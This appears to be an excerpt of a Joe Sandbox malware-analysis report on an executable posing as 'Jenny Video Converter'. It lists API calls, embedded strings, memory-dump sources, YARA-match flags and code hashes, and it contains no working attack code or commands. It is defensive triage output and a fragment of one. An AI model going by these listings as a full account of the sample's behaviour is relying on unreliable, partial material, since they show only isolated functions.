                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmove
                                                                                • String ID: &'
                                                                                • API String ID: 3529519853-655172784
                                                                                • Opcode ID: a8ec218c8a594b5011fd37b4f0966d4d6df3613925d7a3ea852be24f1f620362
                                                                                • Instruction ID: ebc32e56ef3b293fccee4deb559512d721ad046987d5705be0a0299b6ac8276b
                                                                                • Opcode Fuzzy Hash: a8ec218c8a594b5011fd37b4f0966d4d6df3613925d7a3ea852be24f1f620362
                                                                                • Instruction Fuzzy Hash: 4C616A71D00219DFDF25EFA4C990AEDBBB6EF48710F10816AE545AB380D7709E45CBA1
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,00000000), ref: 00404ED1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $
                                                                                • API String ID: 1807457897-3032137957
                                                                                • Opcode ID: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                                                • Instruction ID: e64d793a5bd47a750bf71bc710b27f1b951018593c94bf49e3c2bba34da37a12
                                                                                • Opcode Fuzzy Hash: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                                                • Instruction Fuzzy Hash: 1D416B710142985EEB169714CE59FEB3FE8EB02704F1404F6DA49F61D2C2794924DBBB
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8CBE7
                                                                                  • Part of subcall function 02D8D1C3: std::exception::exception.LIBCMT ref: 02D8D1F2
                                                                                  • Part of subcall function 02D8D979: __EH_prolog.LIBCMT ref: 02D8D97E
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                  • Part of subcall function 02D8D222: __EH_prolog.LIBCMT ref: 02D8D227
                                                                                Strings
                                                                                • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D8CC24
                                                                                • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D8CC1D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_mallocstd::exception::exception
                                                                                • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                • API String ID: 1953324306-1943798000
                                                                                • Opcode ID: 40362b45bcb3e364598f763091a67e62ca22500dafb9b1536e8cf3e73c58648c
                                                                                • Instruction ID: 4bbb40e2ac700ad00615342276caf8ec9105e9cb285b707e84a13b712f23b0fd
                                                                                • Opcode Fuzzy Hash: 40362b45bcb3e364598f763091a67e62ca22500dafb9b1536e8cf3e73c58648c
                                                                                • Instruction Fuzzy Hash: D3217E71D05244EBDB14FFE4E964AAEBBB6EF54704F00405DE845A7390DB709E44CB61
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8CCDC
                                                                                  • Part of subcall function 02D8D29A: std::exception::exception.LIBCMT ref: 02D8D2C7
                                                                                  • Part of subcall function 02D8DAB0: __EH_prolog.LIBCMT ref: 02D8DAB5
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                  • Part of subcall function 02D8D2F7: __EH_prolog.LIBCMT ref: 02D8D2FC
                                                                                Strings
                                                                                • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D8CD19
                                                                                • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D8CD12
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_mallocstd::exception::exception
                                                                                • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                • API String ID: 1953324306-412195191
                                                                                • Opcode ID: a96880f1a338ea37cd3a2ddf7c82bb9332ac037bbc7b83bf8135f721a18a5800
                                                                                • Instruction ID: 3fdfe5af443461b09868481950cb4b6a5a094e2d148bff47efd3268b1bf1426e
                                                                                • Opcode Fuzzy Hash: a96880f1a338ea37cd3a2ddf7c82bb9332ac037bbc7b83bf8135f721a18a5800
                                                                                • Instruction Fuzzy Hash: 10219E71E00248DBDB18FFE8E464AADBBB6EF54704F04404DE906A7380DB709E44CBA1
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02D8535D
                                                                                  • Part of subcall function 02D92EEC: __FF_MSGBANNER.LIBCMT ref: 02D92F03
                                                                                  • Part of subcall function 02D92EEC: __NMSG_WRITE.LIBCMT ref: 02D92F0A
                                                                                  • Part of subcall function 02D92EEC: RtlAllocateHeap.NTDLL(007A0000,00000000,00000001), ref: 02D92F2F
                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02D8536F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                • String ID: \save.dat
                                                                                • API String ID: 4128168839-3580179773
                                                                                • Opcode ID: 21402eef1cfd47135c050399f4cf12cc346018416f013787a0a3b42a72da6656
                                                                                • Instruction ID: f5ae9683544cb5edb9892ce20059b89933d2b7106a0167347bc04974e53f6597
                                                                                • Opcode Fuzzy Hash: 21402eef1cfd47135c050399f4cf12cc346018416f013787a0a3b42a72da6656
                                                                                • Instruction Fuzzy Hash: 25113A729042447BDF22AE659C84E6FFFABDF83650B5501A9F88567302D6A20D02C6A0
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe,00000104,?,00000000,?,?,?,?,00402DEE), ref: 00403374
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName
                                                                                • String ID: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe$h6z
                                                                                • API String ID: 514040917-1070601641
                                                                                • Opcode ID: 4b8fbbe1edf07751b100c16af9a753027d93dae450da557b14ba1428fad57fc3
                                                                                • Instruction ID: 9914cd9322f57819df26321eb5c0d5781e1a9b7dbf92489965342876274e8e32
                                                                                • Opcode Fuzzy Hash: 4b8fbbe1edf07751b100c16af9a753027d93dae450da557b14ba1428fad57fc3
                                                                                • Instruction Fuzzy Hash: 7E113DB2900218BFC711EF99D9C5C9B7BACEB44358B0000BAF905A7281DA759E558BA9
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8396A
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D839C1
                                                                                  • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                                  • Part of subcall function 02D8A551: __EH_prolog.LIBCMT ref: 02D8A556
                                                                                  • Part of subcall function 02D8A551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A565
                                                                                  • Part of subcall function 02D8A551: __CxxThrowException@8.LIBCMT ref: 02D8A584
                                                                                Strings
                                                                                • Day of month is not valid for year, xrefs: 02D839AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Day of month is not valid for year
                                                                                • API String ID: 1404951899-1521898139
                                                                                • Opcode ID: d21960b00a133dbd2354c170308b23d089c05357df67699416f48b4a0f35b110
                                                                                • Instruction ID: 6c6b6eb2f9a511a6709740a9a656e713db51982875c22e79728d7a520bc97b58
                                                                                • Opcode Fuzzy Hash: d21960b00a133dbd2354c170308b23d089c05357df67699416f48b4a0f35b110
                                                                                • Instruction Fuzzy Hash: 1D01D47A810209AADF04FFA8D805AEEB7B9FF14710F40805BEC0493340EB748E55CBA5
                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 02D8FA4A
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D8FA5F
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 4063778783-2104205924
                                                                                • Opcode ID: ebec02a9bd43b2863076fa23cba10cbfe36f674d0877b2f7260099dc0e9e7f48
                                                                                • Instruction ID: 6f4bb5df39713363b307101712f447c1d16319ac84fd2fad432ae016c6ea915e
                                                                                • Opcode Fuzzy Hash: ebec02a9bd43b2863076fa23cba10cbfe36f674d0877b2f7260099dc0e9e7f48
                                                                                • Instruction Fuzzy Hash: C1F0277060430DAADF04FFA888159AFB3ECEB04715F90056AF921E2780EB70EE04C5A4
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D83C1B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 02D83C30
                                                                                  • Part of subcall function 02D923F7: std::exception::exception.LIBCMT ref: 02D92401
                                                                                  • Part of subcall function 02D8A58A: __EH_prolog.LIBCMT ref: 02D8A58F
                                                                                  • Part of subcall function 02D8A58A: __CxxThrowException@8.LIBCMT ref: 02D8A5B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 1300498068-3145022300
                                                                                • Opcode ID: 3eff11a20fb6da70aa7fe43f6725f3cc1ae63315a9ac5098a0cdaae3676f1e40
                                                                                • Instruction ID: fd16c71df20048ac614926aab547dbfe3867704e658e0cf2921670ad4d361264
                                                                                • Opcode Fuzzy Hash: 3eff11a20fb6da70aa7fe43f6725f3cc1ae63315a9ac5098a0cdaae3676f1e40
                                                                                • Instruction Fuzzy Hash: 02F0A072D005049BCB09EF58E450AEAB776EF51311F5040AEEE095B350CB729E4ACAA1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D838D2
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D838F1
                                                                                  • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                                  • Part of subcall function 02D888BF: _memmove.LIBCMT ref: 02D888DF
                                                                                Strings
                                                                                • Year is out of valid range: 1400..10000, xrefs: 02D838E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Year is out of valid range: 1400..10000
                                                                                • API String ID: 3258419250-2344417016
                                                                                • Opcode ID: 82c55aa4ff38a1406a8fcc2f0082da9955c60f9c00a8d06cf6084662b3533ce8
                                                                                • Instruction ID: 5c61df12f332240c538d2136f4b13a34891b22d4171760478758ce6c8c789c94
                                                                                • Opcode Fuzzy Hash: 82c55aa4ff38a1406a8fcc2f0082da9955c60f9c00a8d06cf6084662b3533ce8
                                                                                • Instruction Fuzzy Hash: 06E092B2E401049BE714FB989821BDDB775EB48720F40044AD841A7780DAB51D44CBA5
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D83886
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D838A5
                                                                                  • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                                  • Part of subcall function 02D888BF: _memmove.LIBCMT ref: 02D888DF
                                                                                Strings
                                                                                • Day of month value is out of range 1..31, xrefs: 02D83894
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Day of month value is out of range 1..31
                                                                                • API String ID: 3258419250-1361117730
                                                                                • Opcode ID: 972f790e32c021e540a744be4d539c18a75b9a8e54e334ddce81bf9779ddeedc
                                                                                • Instruction ID: c0195a3fcaf1e1cbfbe6da634444ebe4ee0391f1874366f92c99306d4575a5ab
                                                                                • Opcode Fuzzy Hash: 972f790e32c021e540a744be4d539c18a75b9a8e54e334ddce81bf9779ddeedc
                                                                                • Instruction Fuzzy Hash: B3E0D872E001049BE714BF98D821FDDB775EF48720F40004AD801B3780DAB51D448BE5
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8391E
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D8393D
                                                                                  • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                                  • Part of subcall function 02D888BF: _memmove.LIBCMT ref: 02D888DF
                                                                                Strings
                                                                                • Month number is out of range 1..12, xrefs: 02D8392C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Month number is out of range 1..12
                                                                                • API String ID: 3258419250-4198407886
                                                                                • Opcode ID: fd93ada1535330a85f41e71d73f47934bd5418a8b9ba24e1ad6068f9f0a8ddea
                                                                                • Instruction ID: 609d990356f7f324218fd67989a519a37636f8054f12f4c9b35c14dc68047e8a
                                                                                • Opcode Fuzzy Hash: fd93ada1535330a85f41e71d73f47934bd5418a8b9ba24e1ad6068f9f0a8ddea
                                                                                • Instruction Fuzzy Hash: 68E0D872E001089BE714BF989821FDDB775EF08720F50044AD801A3780DAB51D448BE5
                                                                                APIs
                                                                                • TlsAlloc.KERNEL32 ref: 02D819CC
                                                                                • GetLastError.KERNEL32 ref: 02D819D9
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocErrorH_prologLast
                                                                                • String ID: tss
                                                                                • API String ID: 249634027-1638339373
                                                                                • Opcode ID: 7605fe46fbbc93d4ac29a6b6f606849a51801ec6434299f61335b2c125771d9b
                                                                                • Instruction ID: d09e798584c2abe8282dcdbcb90d1c457933071a24a62dbaab2e682ef17878f3
                                                                                • Opcode Fuzzy Hash: 7605fe46fbbc93d4ac29a6b6f606849a51801ec6434299f61335b2c125771d9b
                                                                                • Instruction Fuzzy Hash: B3E04F329042109B87007A78E80948FBBA4DA41231F108B6AECBD833D0EA308D158ADA
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D83BD8
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 02D83BED
                                                                                  • Part of subcall function 02D923F7: std::exception::exception.LIBCMT ref: 02D92401
                                                                                  • Part of subcall function 02D8A58A: __EH_prolog.LIBCMT ref: 02D8A58F
                                                                                  • Part of subcall function 02D8A58A: __CxxThrowException@8.LIBCMT ref: 02D8A5B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 1300498068-3145022300
                                                                                • Opcode ID: 9f3706ee289fc99cf911a59173c83e0ec8130b76f430a591dcbf296e60d9670f
                                                                                • Instruction ID: 38f4798b63a0a84cdb3afe6f71d9b9867d0bcfb1d316733a1727026ba133a4e4
                                                                                • Opcode Fuzzy Hash: 9f3706ee289fc99cf911a59173c83e0ec8130b76f430a591dcbf296e60d9670f
                                                                                • Instruction Fuzzy Hash: E9E01A719001089BD704EF54E561BA9B771EB54301F4080ADED0657790CB359D56CEA5
                                                                                APIs
                                                                                • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 00404494
                                                                                • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044C8
                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
                                                                                • HeapFree.KERNEL32(00000000,?,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 3499195154-0
                                                                                • Opcode ID: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                                • Instruction ID: 6532d2b8740b88ca5c68c93f46193dcc45771cdeba7f909f778517217a69801f
                                                                                • Opcode Fuzzy Hash: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                                • Instruction Fuzzy Hash: 02113670200301AFC731CF29EE45A627BB5FB847207104A3AF252E65F0D775A866EF19